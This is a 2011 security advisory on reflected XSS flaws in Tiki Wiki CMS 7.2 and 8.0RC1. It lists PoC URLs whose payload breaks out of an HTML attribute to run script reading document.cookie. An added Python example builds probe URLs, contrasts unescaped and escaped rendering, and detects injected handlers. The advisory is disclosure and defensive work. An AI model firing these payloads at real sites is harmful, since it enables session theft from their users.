INFOSERVE-ADV2011-01 - Tiki Wiki CMS Groupware Multiple XSS vulnerabilities

Advisory:           Tiki Wiki CMS Groupware Multiple XSS vulnerabilities
Advisory ID:        INFOSERVE-ADV2011-01
Author:             Stefan Schurtz
Contact:
Affected Software:  Successfully tested on Tiki 7.2 & 8.0 RC1
Vendor URL:
Vendor Status:      fixed for Tiki 7 (New Tiki 6 LTS release in progress)
CVE-ID:             CVE-2011-4454, CVE-2011-4455
======================
Vulnerability Description
======================
All versions of Tiki 6 and Tiki 7, and Tiki 8.0RC1, are prone to multiple reflected XSS vulnerabilities. In each affected script the path component appended after the script name (PATH_INFO, e.g. tiki-index.php/<payload>) is reflected into an HTML attribute without encoding. A double quote therefore closes the attribute and the rest of the payload is parsed as a new event-handler attribute; the PoC below uses this to run JavaScript with access to document.cookie in the browser of any user who loads the crafted URL.
==============
PoC-Exploit
==============
8.0RC1
http://<target>/tiki-8.0.RC1/tiki-remind_password.php/" onmouseover="alert(document.cookie)"
http://<target>/tiki-8.0.RC1/tiki-index.php/" onmouseover="alert(document.cookie)"
http://<target>/tiki-8.0.RC1/tiki-login_scr.php/" onmouseover="alert(document.cookie)"
http://<target>/tiki-8.0.RC1/tiki-index/" onmouseover="alert(document.cookie)"

7.2
http://<target>/tiki-7.2/tiki-admin_system.php/" onmouseover="alert(document.cookie)"
http://<target>/tiki-7.2/tiki-pagehistory.php/" onmouseover="alert(document.cookie)"
http://<target>/tiki-7.2/tiki-removepage.php/" onmouseover="alert(document.cookie)"
http://<target>/tiki-7.2/tiki-rename_page.php/" onmouseover="alert(document.cookie)"
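The following Python is an added example and is not the INFOSERVE PoC code nor part of Tiki. It models the bug class the PoC URLs above exercise (path info after the script name reflected, unencoded, into an HTML attribute), shows the hardened rendering beside it, builds the probe URLs from the script list above, and checks a rendered page for injected event-handler attributes. The two render_* functions are assumed illustrations of the vulnerable and fixed pattern, not Tiki's own templates; http://<target> is the advisory's placeholder host.

```python
"""
Added example for this advisory; it is not the INFOSERVE PoC code and not
part of Tiki. It models the bug class the PoC URLs exercise (path info
after the script name reflected, unencoded, into an HTML attribute) and
checks a rendered page for injected event-handler attributes. The two
render_* functions are assumed illustrations of the vulnerable and the
hardened pattern, not Tiki's own templates.
"""
import html
from html.parser import HTMLParser
from urllib.parse import quote

# Payload taken from the advisory: closes the current attribute value and
# appends an event handler that runs with access to document.cookie.
PAYLOAD = '" onmouseover="alert(document.cookie)"'

# Scripts named in the advisory's PoC section, per version.
SCRIPTS_80RC1 = ["tiki-remind_password.php", "tiki-index.php",
                 "tiki-login_scr.php", "tiki-index"]
SCRIPTS_72 = ["tiki-admin_system.php", "tiki-pagehistory.php",
              "tiki-removepage.php", "tiki-rename_page.php"]


def probe_url(base, script, payload=PAYLOAD):
    """Build the PoC URL for one script: the payload rides in the path
    component after the script name (PATH_INFO), percent-encoded so the
    request line stays valid; the server decodes it before reflecting."""
    return f"{base.rstrip('/')}/{script}/{quote(payload, safe='')}"


def render_vulnerable(request_path):
    """Assumed vulnerable pattern (illustration, not Tiki code): the
    decoded request path, e.g. PHP_SELF, is echoed raw into an attribute."""
    return f'<form action="{request_path}" method="post"></form>'


def render_fixed(request_path):
    """Hardened form: attribute-encode the value. quote=True turns the
    double quote into &quot;, so the attribute cannot be closed early."""
    safe = html.escape(request_path, quote=True)
    return f'<form action="{safe}" method="post"></form>'


class _HandlerFinder(HTMLParser):
    """Collect (tag, attribute, value) for every on* attribute seen."""

    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.startswith("on"):
                self.found.append((tag, name, value))


def injected_handlers(body):
    """Return the event-handler attributes present in an HTML body.
    The parser sees attribute structure, so a payload that survives only
    as &quot;-escaped text inside a value is not reported."""
    finder = _HandlerFinder()
    finder.feed(body)
    finder.close()
    return finder.found


def is_exploitable(render, script, payload=PAYLOAD):
    """Simulate the request a PoC URL produces: the application sees the
    decoded path '/<script>/<payload>' and renders a page from it."""
    return bool(injected_handlers(render(f"/{script}/{payload}")))


if __name__ == "__main__":
    # 'http://<target>' is the advisory's placeholder host.
    for script in SCRIPTS_80RC1 + SCRIPTS_72:
        print(probe_url("http://<target>", script))
    print("vulnerable pattern exploitable:",
          is_exploitable(render_vulnerable, "tiki-index.php"))
    print("hardened pattern exploitable:",
          is_exploitable(render_fixed, "tiki-index.php"))
```

Against a live instance the same check applies to the real response body: fetch probe_url(...) and pass the HTML to injected_handlers(); a page that reflects the path only as &quot;-escaped text yields no handler and is not affected by this bug.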
=====
Solution
=====
Upgrade to Tiki 8.1 (End-of-Life for Tiki 7.x)
================
Disclosure Timeline
================
02-Nov-2011 – informed Security Team (security@tikiwiki.org)
03-Nov-2011 – feedback from vendor
11-Nov-2011 – release of version 8.1 (End-of-Life for Tiki 7.x)
====
Credits
====
Vulnerabilities found and advisory written by the INFOSERVE Security Team
=======
References
=======
http://info.tiki.org/
http://dev.tiki.org/tiki-view_tracker_item.php?itemId=4027#content1
http://info.tiki.org/article182-Tiki-8-1-Now-Available-End-of-Life-for-Tiki-7-x
http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-01.txt
http://secunia.com/advisories/46740